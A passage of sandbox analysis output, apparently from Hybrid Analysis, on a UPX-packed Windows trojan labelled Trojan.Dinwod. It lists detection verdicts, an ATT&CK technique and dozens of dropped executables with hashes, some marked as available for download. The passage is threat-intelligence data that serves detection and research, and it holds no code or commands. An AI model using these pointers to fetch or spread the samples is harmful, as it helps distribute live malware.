"attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e
https://hybrid-analysis.com/sample/511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e
Hybrid Analysis - Infostealers
{"size": 342079, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e", "sha256": "511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 98, "extracted_files": [{"name": "00288.exe", "file_path": "C:\\00288.exe", "file_size": 342840, "sha256": "3884c4b20bcb0ce73a059e87abb32a981f19390172e942eaa8e98089f568e3c5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00288.exe (PID: 388)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0260006.exe", "file_path": "C:\\0260006.exe", "file_size": 342137, "sha256": "ea1285beb4f0f2c94d454489dd2ae986d4ef2543f056c047ec6d2aab90c4de58", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "28482.exe (PID: 5924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06626.exe", "file_path": "C:\\06626.exe", "file_size": 342106, "sha256": "59c1694b096767dc0aee86454918fe48614140702cf870036917dde039e5cf05", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "06626.exe (PID: 5952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "20046.exe", "file_path": "C:\\20046.exe", "file_size": 342359, "sha256": "b8919ec411c4d0f6569b9b39b7f194c2717bbae486fd9900d3a080a9f66c1a47", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "20046.exe (PID: 3352)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2822060.exe", "file_path": "C:\\2822060.exe", "file_size": 343034, "sha256": "f18e69e3fd7dc7153e44fe57ff8525ccadaf3dac6493383edf39b910006f4179", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "46000.exe (PID: 2724)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "28482.exe", "file_path": "C:\\28482.exe", "file_size": 342117, "sha256": "04c6610e39b32e4400b70736975861cf057199882ea5f71a019a44080a775fdc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "28482.exe (PID: 5924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "28800.exe", "file_path": "C:\\28800.exe", "file_size": 342349, "sha256": "9617f1989c1ce343921d68e7936b316ab35dad642cb728bf8ed42ee948e0d60b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64226.exe (PID: 4508)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "288022.exe", "file_path": "C:\\288022.exe", "file_size": 342990, "sha256": "232798e943964c6a961d974de05ecb2da8e682e915f81a1c2254e62a740793eb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "446022.exe (PID: 3380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4240462.exe", "file_path": "C:\\4240462.exe", "file_size": 342441, "sha256": "f7e99745af05c2fbbac6ba0f443fbc67d01dbdd61fe71801c8b2446b09eba1fe", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4240462.exe (PID: 3348)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "444002.exe", "file_path": "C:\\444002.exe", "file_size": 342763, "sha256": "2b10c9c820515308c00797fd917fb99d305427ab89f990e5ecafd95c76b3fe8b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "444002.exe (PID: 1744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "446022.exe", "file_path": "C:\\446022.exe", "file_size": 342978, "sha256": "93d79c048a11e401f3cc9676805a57fc5851ea589bdf0d349c79b2da8471c9e3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fdrnfdr.exe (PID: 1724)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "44628.exe", "file_path": "C:\\44628.exe", "file_size": 342153, "sha256": "c9f5e3b8a2b3b1c01a6b6313936fa037f935d58609320e5fe0a62289964e11dc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0260006.exe (PID: 4428)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "46000.exe", "file_path": "C:\\46000.exe", "file_size": 343024, "sha256": "cbcd6e7a8526a2cedf9f4f5d35c830ced25a5f0d294a55b8ffb6395da79c465f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "46000.exe (PID: 2724)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "460060.exe", "file_path": "C:\\460060.exe", "file_size": 342223, "sha256": "387f5610366f1716199f8f454152ca88c899e8e5793c9d8caad3ee01fda3deda", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lvvdvpj.exe (PID: 4476)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "46248.exe", "file_path": "C:\\46248.exe", "file_size": 342828, "sha256": "e93dc62d2e8a0b90984da4beacc486cb759c4e9dbeda108b5672c665c6276c64", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "60860.exe (PID: 1220)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4688686.exe", "file_path": "C:\\4688686.exe", "file_size": 342426, "sha256": "1a61b2756c4e9002354948088d52910f13db541a10615e2a65d41bc563763c8b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4688686.exe (PID: 944)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6062268.exe", "file_path": "C:\\6062268.exe", "file_size": 342389, "sha256": "152553535d93bf49ed0621955765e207d754135862905d3e570959c0aa85e8d8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6062268.exe (PID: 4520)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60860.exe", "file_path": "C:\\60860.exe", "file_size": 342811, "sha256": "b6f817f7c0a5e0377cc23b9e7fc7f6cb757cf1e8cf6f7852dc017e28994619ed", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "628644.exe (PID: 568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "620262.exe", "file_path": "C:\\620262.exe", "file_size": 342778, "sha256": "45555419afa7096473d9fcbc7c3abc4549672c465d8766e74f5d6484237ae35e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "444002.exe (PID: 1744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "628644.exe", "file_path": "C:\\628644.exe", "file_size": 342793, "sha256": "354d114633c5aea4de5ee7d7db1996cb93e6bde4f6fb8bd8a0bf126749e0c02c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "628644.exe (PID: 568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64226.exe", "file_path": "C:\\64226.exe", "file_size": 342331, "sha256": "c19e13dd0ab7ec630d19cc80a21f837668e83a930f8aaf9fc0e801daa596a59c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64226.exe (PID: 4508)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "642428.exe", "file_path": "C:\\642428.exe", "file_size": 342753, "sha256": "83d699b25591c0b85dff6fd706892cbcb000a0fb776817a7d764c4703cd650b1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "642428.exe (PID: 328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "644802.exe", "file_path": "C:\\644802.exe", "file_size": 343007, "sha256": "49a9ba62033b753cad2cfc6f0e8e4d5d7629f27209248a216ec013a3573e5544", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "644802.exe (PID: 3584)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64600.exe", "file_path": "C:\\64600.exe", "file_size": 342738, "sha256": "68adf4d9d3ff38af7410f1ba0ebdf851fbd8a54f8b463f201f1aef9cf4199219", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64600.exe (PID: 3760)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64826.exe", "file_path": "C:\\64826.exe", "file_size": 342722, "sha256": "68ba4e5c453865a142b890cb11d72c5e1e90908d23ef278ac453be74c0ffe75a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xjntxb.exe (PID: 3896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "682606.exe", "file_path": "C:\\682606.exe", "file_size": 342850, "sha256": "4279b9500c765c3068f43ca8aaccb4370f6a34ef1fa3b41ef48000d193db8161", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "682606.exe (PID: 2448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "68448.exe", "file_path": "C:\\68448.exe", "file_size": 342457, "sha256": "1c23ae082ddbb5a6c8b5cd0a854ad8304c4dafc80fcfb4d6da25705568ff2128", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4240462.exe (PID: 3348)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6884282.exe", "file_path": "C:\\6884282.exe", "file_size": 342408, "sha256": "ec6521c7707eafe41a8893d752fef291e9bcd64d80afd3d39ca92b4c0928ed03", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6884282.exe (PID: 1900)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8028040.exe", "file_path": "C:\\8028040.exe", "file_size": 342185, "sha256": "ac7c9c20730638e9f8d9fc58d7153cf0371a1a1ec7ae57f365aecae8c029db57", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lnxndll.exe (PID: 4064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8420244.exe", "file_path": "C:\\8420244.exe", "file_size": 342236, "sha256": "4b3f4f622e85d3179f713ba9a91a7b3628ea5de1f97e71692b57453a27a0df17", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "460060.exe (PID: 4256)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8608268.exe", "file_path": "C:\\8608268.exe", "file_size": 342370, "sha256": "f088cd706932ecbfccb09cba6b7d963800957ba8efc33bfff16651e040eeb490", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "20046.exe (PID: 3352)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bbxnv.exe", "file_path": "C:\\bbxnv.exe", "file_size": 342613, "sha256": "8484d3db5b42badc3d6d5eb6fc8a5ef312541abe6670ba98c72327948b64ec55", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bbxnv.exe (PID: 2284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bdppl.exe", "file_path": "C:\\bdppl.exe", "file_size": 342248, "sha256": "04f1c8568a82cebe0cce382694c5bd6db4e98bf961496f915731cecaf77a8f2d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bdppl.exe (PID: 6032)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "blphnxr.exe", "file_path": "C:\\blphnxr.exe", "file_size": 342587, "sha256": "6a995772d2263f7f2c28ce95de985a8f8af59696ba11db35b3ca2577d9876e48", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "blphnxr.exe (PID: 1284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dhrldf.exe", "file_path": "C:\\dhrldf.exe", "file_size": 342671, "sha256": "77b4a5b2b73662c67ca4bee4a13ad6345dbe0bb972adb4a333b70be01fb64e25", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dhrldf.exe (PID: 4616)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dthbf.exe", "file_path": "C:\\dthbf.exe", "file_size": 342600, "sha256": "7016083957fd823c93edd57ef49fda33b22afc66a1e96bbcc084364d258a7ba5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "blphnxr.exe (PID: 1284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dtxrlp.exe", "file_path": "C:\\dtxrlp.exe", "file_size": 342266, "sha256": "68363949e814bd0030087074ded996a42cb3ec8d2ee7501d14a1217cf44db659", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bdppl.exe (PID: 6032)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fdrnfdr.exe", "file_path": "C:\\fdrnfdr.exe", "file_size": 342967, "sha256": "95d6b14b507e5487c767f11e993111a34aaf74cd74490b84c16bb9712a5deb80", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jbvpj.exe (PID: 1700)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ffdpvvb.exe", "file_path": "C:\\ffdpvvb.exe", "file_size": 342626, "sha256": "e4edadb0637591d747b770589986c28c444231b0a275a3b6aaee55cf56f04e51", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ffdpvvb.exe (PID: 4580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "frljb.exe", "file_path": "C:\\frljb.exe", "file_size": 342686, "sha256": "b93e909ba0260a5b1360a1bab9592aa66ad5638068c6afb89417c8387c044f35", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dhrldf.exe (PID: 4616)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hpfbrjf.exe", "file_path": "C:\\hpfbrjf.exe", "file_size": 342657, "sha256": "f78fc4a6b4f1eed204f54f1df43d31f62e7a5f10b28ebf68b875a5e30f7c8b83", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hpfbrjf.exe (PID: 4588)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jbvpj.exe", "file_path": "C:\\jbvpj.exe", "file_size": 342948, "sha256": "3c4545971a87c35c4d402e723204bcda2ff06fd95c2b7e1856b9099ab67f8bef", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jbvpj.exe (PID: 1700)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jdrfr.exe", "file_path": "C:\\jdrfr.exe", "file_size": 342866, "sha256": "093b55e829824cbb680a068dfd691ef413d9cbc3079c71de648b3862558bb537", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "682606.exe (PID: 2448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jftjpxt.exe", "file_path": "C:\\jftjpxt.exe", "file_size": 342317, "sha256": "70e27cea1fcc33a3ca25a04fa17a22d8483a31d4e1eb0cd490cdf8aa161ee557", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jftjpxt.exe (PID: 3364)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jjtrtt.exe", "file_path": "C:\\jjtrtt.exe", "file_size": 342883, "sha256": "d0f76942ee5e0be6c4e646a6aa07b31cf5952868ddbdcda145c230b3ad59b329", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jjtrtt.exe (PID: 3308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jptlrlr.exe", "file_path": "C:\\jptlrlr.exe", "file_size": 342913, "sha256": "b7bf490da381cbf45bd42ca733d22d0ba8258086b11232807cf98acfc83a0ae9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nvpvtb.exe (PID: 768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jxhdr.exe", "file_path": "C:\\jxhdr.exe", "file_size": 342571, "sha256": "b9055aab4d4c7f173312d2129f9f62097da371035b4231786262cf1ead9c2c63", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rptdfh.exe (PID: 3580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ldpnpvp.exe", "file_path": "C:\\ldpnpvp.exe", "file_size": 342931, "sha256": "3e18bb054abfce1a3c3497b12723032e8b97107a5b894aa65ceefb5fcc5fc81b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ldpnpvp.exe (PID: 3948)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lnxndll.exe", "file_path": "C:\\lnxndll.exe", "file_size": 342174, "sha256": "ced53ef82f3abf82aa6960c6f69a77a9714842b8e301d7b754eea5f2ce9da4b2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xlrdpdb.exe (PID: 864)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lvvdvpj.exe", "file_path": "C:\\lvvdvpj.exe", "file_size": 342212, "sha256": "7f2c57a43f838c45bf8becd8e8fecfb405b3181c765c221b86cf200d8f9a7628", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lvvdvpj.exe (PID: 4476)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nblhvh.exe", "file_path": "C:\\nblhvh.exe", "file_size": 342510, "sha256": "debc4ce9d4a1713e885f24eafdf62a4f7ce99903cdd50ab084fe7194e774bc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nblhvh.exe (PID: 4060)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ndfntv.exe", "file_path": "C:\\ndfntv.exe", "file_size": 342196, "sha256": "c6b6e5199002043619c869b966457a8e850e893e4a9a93b673e0a5b07dcf83e4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8028040.exe (PID: 4168)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nvpvtb.exe", "file_path": "C:\\nvpvtb.exe", "file_size": 342901, "sha256": "bcb949616de0b888d12ce715e3acc08e8c2e9ed3172293244d4d9583b77f0630", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nvpvtb.exe (PID: 768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pbbvvxt.exe", "file_path": "C:\\pbbvvxt.exe", "file_size": 342299, "sha256": "8df2e69b480534049d6f5fa6fce22af9a6e56df5323a89f925d6b80022941a4f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pdbtf.exe (PID: 2700)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pdbtf.exe", "file_path": "C:\\pdbtf.exe", "file_size": 342282, "sha256": "2b29eaa660f15debacc6eb2b64bb65205b571b98e281471291acda5a2fc00ef3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pdbtf.exe (PID: 2700)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pvjjxn.exe", "file_path": "C:\\pvjjxn.exe", "file_size": 342538, "sha256": "92827e64d8e0abe3b419005855115cba8e04c43b01cc6b16c107362c08ad06e2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rhlpfp.exe (PID: 3616)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rhlpfp.exe", "file_path": "C:\\rhlpfp.exe", "file_size": 342527, "sha256": "f790dced51b894c8942c13cb8fc8c924f2fb657f3388fe2b3919bf5d9dda0f97", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rhlpfp.exe (PID: 3616)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rptdfh.exe", "file_path": "C:\\rptdfh.exe", "file_size": 342555, "sha256": "1a2b6f8170da829545b704e97ff495f0147c8f0d01f341b8aa578b5d594a676a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rptdfh.exe (PID: 3580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vftrx.exe", "file_path": "C:\\vftrx.exe", "file_size": 342089, "sha256": "a4af1f09f8766de27fe8e23ed94c91d40107c1268bf648d20437d31710b4b385", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vjnxj.exe", "file_path": "C:\\vjnxj.exe", "file_size": 342640, "sha256": "3c05ea77d4fc4a64dcc6163fba9cfaa39d028eed52a1e3f173a63ed092efe48a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ffdpvvb.exe (PID: 4580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vpdhr.exe", "file_path": "C:\\vpdhr.exe", "file_size": 342476, "sha256": "237f8daa367b9a37b5df621bf4906f0326dc7e58f61c9d53374f5dd1e4c819f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vpdhr.exe (PID: 1844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xffxhjl.exe", "file_path": "C:\\xffxhjl.exe", "file_size": 342493, "sha256": "8eeb1ffd197f9772eda973f30bf34ccb3aa684af4b064a9f7e70e954d40c751e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vpdhr.exe (PID: 1844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xjntxb.exe", "file_path": "C:\\xjntxb.exe", "file_size": 342704, "sha256": "bc2420cd0b06b138ba18cc6dbb176bfe441772e6d9c8265f63c434e17e56d616", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "frljb.exe (PID: 2472)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xlrdpdb.exe", "file_path": "C:\\xlrdpdb.exe", "file_size": 342164, "sha256": "00014e7b1dd32840dd45dabcb4cd8759726d6f002fe9177dd40dbf12fcd83796", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xlrdpdb.exe (PID: 864)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hnldj.exe", "file_size": 343300, "sha256": "05dc6e49230e45d7c83a0bbee8391d6c0e2a7580f6177540232facf0d096c8eb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "txvhpv.exe", "file_size": 343290, "sha256": "ac749587a63f77d39964bba50f2a0c34a205d8e8aa61461682ed36590784e4e0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "800884.exe", "file_size": 343273, "sha256": "91fe6d91e8209e81c7694b472ded869aad5036d0588bd4f7e818f0b2f152be58", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "800608.exe", "file_size": 343254, "sha256": "094d103b58b7b3766d5bbaf72fbc9c23d2a2da1b03878069c75097ce5906a9b0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "082060.exe", "file_size": 343237, "sha256": "854385cf2f8b2744aec1259b6b7511527f98d9bfaaace41668089271dd218e0c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22802.exe", "file_size": 343224, "sha256": "449620335d2c997e4ebe214f11fb0fe6e3364fb45379238f8714d8dcf1631b78", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2224020.exe", "file_size": 343207, "sha256": "d7a2e5ebd83818c07feccfa189c75210f728b3b4d40a3d01a3d4b28ae970e43e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8886462.exe", "file_size": 343195, "sha256": "045e7ab492c09a012974d2902ace8769ce27f0d522e59d72b2d30946e7f82066", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dhpnj.exe", "file_size": 343185, "sha256": 